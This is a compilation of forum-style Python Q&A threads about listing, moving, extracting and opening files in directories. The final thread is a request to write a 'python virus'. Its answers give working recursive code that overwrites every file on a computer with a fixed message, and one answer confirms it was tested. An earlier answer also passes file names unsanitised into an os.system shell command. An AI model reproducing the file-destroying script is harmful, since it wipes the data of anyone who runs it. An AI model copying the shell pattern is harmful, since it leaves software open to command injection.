How to check whats there after unzipiping a tar file - python

So, Im writing a python script which will open a tar file and if there is a directory in it, my script will open that directory and check for files...
E = raw_input("Enter the tar file name: ") // This will take input from the user
tf = tarfile.open(E) // this will open the tar file
Now whats the best way to check it 'tf' is having directory or not ? Rather then going my terminal and doing ls there I want do something in the same python script that checks if there is a directory after unzipping the tar.

In Python you can check to see if paths exist by using the os.path.exists(f) command, where f is a string representation of the filename and its path:
import os
path = 'path/filename'
if os.path.exists(path):
print('it exists')
EDIT:
The tarfile object has a method "getnames()" which gives the paths of all the objects in the tar file.
paths = tf.getnames() #returns list of pathnames
f = paths[1] #say the 2nd element in the list is the file you want
tf.extractfile(f)
Say there's a file named "file1" in directory "S3". Then one of the elements of tf.getnames() will be 'S3/file1'. Then you can extract it.

Related

Is there a way to change your cwd in Python using a file as an input?

I have a Python program where I am calculating the number of files within different directories, but I wanted to know if it was possible to use a text file containing a list of different directory locations to change the cwd within my program?
Input: Would be a text file that has different folder locations that contains various files.
I have my program set up to return the total amount of files in a given folder location and return the amount to a count text file that will be located in each folder the program is called on.
You can use os module in Python.
import os
# dirs will store the list of directories, can be populated from your text file
dirs = []
text_file = open(your_text_file, "r")
for dir in text_file.readlines():
dirs.append(dir)
#Now simply loop over dirs list
for directory in dirs:
# Change directory
os.chdir(directory)
# Print cwd
print(os.getcwd())
# Print number of files in cwd
print(len([name for name in os.listdir(directory)
if os.path.isfile(os.path.join(directory, name))]))
Yes.
start_dir = os.getcwd()
indexfile = open(dir_index_file, "r")
for targetdir in indexfile.readlines():
os.chdir(targetdir)
# Do your stuff here
os.chdir(start_dir)
Do bear in mind that if your program dies half way through it'll leave you in a different working directory to the one you started in, which is confusing for users and can occasionally be dangerous (especially if they don't notice it's happened and start trying to delete files that they expect to be there - they might get the wrong file). You might want to consider if there's a way to achieve what you want without changing the working directory.
EDIT:
And to suggest the latter, rather than changing directory use os.listdir() to get the files in the directory of interest:
import os
start_dir = os.getcwd()
indexfile = open(dir_index_file, "r")
for targetdir in indexfile.readlines():
contents = os.listdir(targetdir)
numfiles = len(contents)
countfile = open(os.path.join(targetdir, "count.txt"), "w")
countfile.write(str(numfiles))
countfile.close()
Note that this will count files and directories, not just files. If you only want files then you'll have to go through the list returned by os.listdir checking whether each item is a file using os.path.isfile()

Scan a directory and transfer files

I think that's easy but my script doesn't work. I think it's gonna be easier if I show you what I want: I want a script (in python) which does that:
I have a directory like:
boite_noire/
....helloworld/
....test1.txt/
....test2.txt/
And after running the script I would like something like:
boite_noire/
helloworld/
....test1/
........test1_date.txt
....test2/
........test2_date.txt
and if I add an other test1.txt like:
boite_noire/
helloworld/
....test1/
........test1_date.txt
....test2/
........test2_date.txt
....test1.txt
The next time I run the script:
boite_noire/
helloworld/
....test1/
........test1_date.txt
........test1_date.txt
....test2/
........test2_date.txt
I wrote this script :
But os.walk read files in directories and then create a directory named as the file, and I don't want that :(
Can someone help me please?
You could loop through each file and move it into the correct directory. This will work on a linux system (not sure about Windows - maybe better to use the shutil.move command).
import os
import time
d = 'www/boite_noire'
date = time.strftime('%Y_%m_%d_%H_%M_%S')
filesAll = os.listdir(d)
filesValid= [i for i in filesAll if i[-4:]=='.txt']
for f in filesValid:
newName = f[:-4]+'_'+date+'.txt'
try:
os.mkdir('{0}/{1}'.format(d, f[:-4]))
except:
print 'Directory {0}/{1} already exists'.format(d, f[:-4])
os.system('mv {0}/{1} {0}/{2}/{3}'.format(d, f, f[:-4], newName))
This is what the code is doing:
Find all file in a specified directory
Check the extension is .txt
For each valid file:
Create a new name by appending the date/time
Create the directory if it exists
move the file into the directory (changing the name as it is moved)

Python script to recursively open .rar files in a directory

I'm writing this python script to recursively go through a directory and use the unrar utility on ubuntu to open all .rar files. For some reason it will enter the directory, list some contents, enter the first sub-directory, open one .rar file, then print all the other contents of the parent directory without going into them. Any ideas on why it would be doing this? I'm pretty new to python, so go easy.
"""Recursively unrars a directory"""
import subprocess
import os
def runrar(directory):
os.chdir(directory)
dlist = subprocess.check_output(["ls"])
for line in dlist.splitlines():
print(line)
if isRar(line):
print("unrar e " + directory + '/' + line)
arg = directory + '/' + line
subprocess.call(['unrar', 'e', arg])
if os.path.isdir(line):
print 'here'
runrar(directory + '/' + line)
def isRar(line):
var = line[-4:]
if os.path.isdir(line):
return False
if(var == ".rar"):
return True
return False
directory = raw_input("Please enter the full directory: ")
print(directory)
runrar(directory)
There are a lot of problems and clumsy uses of python in your code, I may not be able to list them. Examples:
using os.chdir
using output of ls to read a directory (very wrong and not portable on windows!)
recursivity can be avoided with os.walk
computing extension of a file is easier
checking twice if it's a directory...
my proposal:
for root,_,the_files in os.walk(path)
for f in the_files:
if f.lower().endswith(".rar"):
subprocess.call(['unrar', 'e', arg],cwd=root)
that loops through the files (and dirs, but we ignore them and we materialize it by putting the dir list into the _ variable, just a convention, but an effective one), and calls the command using subprocess which changes directory locally so unrar extracts the files in the directory where the archive is.
(In that typical os.walk loop, root is the directory and f is the filename (without path), just what we need to run a subprocess in the proper current dir, so no need for os.path.join to compute the full path)

Adding actual files to a list, instead of just the file's string name

I am having issues reading the contents of the files I am trying to open due to the fact that python believes there is:
"No such file or directory: 'Filename.xrf'"
Here is an outline of my code and what I think the problem may be:
The user's input defines the path to where the files are.
direct = str(raw_input("Enter directory name where your data is: ))
path = "/Users/myname/Desktop/heasoft/XRF_data/%s/40_keV" \
%(direct)
print os.listdir(path)
# This lists the correct contents of the directory that I wanted it to.
So here I essentially let the user decide which directory they want to manipulate and then I choose one more directory path named "40_keV".
Within a defined function I use the OS module to navigate to the corresponding directory and then append every file within the 40_keV directory to a list, named dataFiles.
def Spectrumdivide():
dataFiles = []
for root, dirs, files in os.walk(path):
for file in files:
if file.endswith('.xrf'):
dataFiles.append(file)
Here, the correct files were appended to the list 'dataFiles', but I think this may be where the problem is occurring. I'm not sure whether or not Python is adding the NAME of the file to my list instead of the actual file object.
The code breaks because python believes there is no such file or directory.
for filename in dataFiles:
print filename
f = open(filename,'r') # <- THE CODE BREAKS HERE
print "Opening file: " + filename
line_num = f.readlines()
Again, the correct file is printed from dataFiles[0] in the first iteration of the loop but then this common error is produced:
IOError: [Errno 2] No such file or directory: '40keV_1.xrf'
I'm using an Anaconda launcher to run Spyder (Python 2.7) and the files are text files containing two columns of equal length. The goal is to assign each column to a list and the manipulate them accordingly.
You need to append the path name not just the file's name using the os.path.join function.
for root, dirs, files in os.walk(path):
for file in files:
if file.endswith('.xrf'):
dataFiles.append(os.path.join(root, file))

Listing Directories In Python Multi Line

i need help trying to list directories in python, i am trying to code a python virus, just proof of concept, nothing special.
#!/usr/bin/python
import os, sys
VIRUS=''
data=str(os.listdir('.'))
data=data.translate(None, "[],\n'")
print data
f = open(data, "w")
f.write(VIRUS)
f.close()
EDIT: I need it to be multi-lined so when I list the directorys I can infect the first file that is listed then the second and so on.
I don't want to use the ls command cause I want it to be multi-platform.
Don't call str on the result of os.listdir if you're just going to try to parse it again. Instead, use the result directly:
for item in os.listdir('.'):
print item # or do something else with item
So when writing a virus like this, you will want it to be recursive. This way it will be able to go inside every directory it finds and write over those files as well, completely destroying every single file on the computer.
def virus(directory=os.getcwd()):
VIRUS = "THIS FILE IS NOW INFECTED"
if directory[-1] == "/": #making sure directory can be concencated with file
pass
else:
directory = directory + "/" #making sure directory can be concencated with file
files = os.listdir(directory)
for i in files:
location = directory + i
if os.path.isfile(location):
with open(location,'w') as f:
f.write(VIRUS)
elif os.path.isdir(location):
virus(directory=location) #running function again if in a directory to go inside those files
Now this one line will rewrite all files as the message in the variable VIRUS:
virus()
Extra explanation:
the reason I have the default as: directory=os.getcwd() is because you originally were using ".", which, in the listdir method, will be the current working directories files. I needed the name of the directory on file in order to pull the nested directories
This does work!:
I ran it in a test directory on my computer and every file in every nested directory had it's content replaced with: "THIS FILE IS NOW INFECTED"
Something like this:
import os
VIRUS = "some text"
data = os.listdir(".") #returns a list of files and directories
for x in data: #iterate over the list
if os.path.isfile(x): #if current item is a file then perform write operation
#use `with` statement for handling files, it automatically closes the file
with open(x,'w') as f:
f.write(VIRUS)

Categories

Resources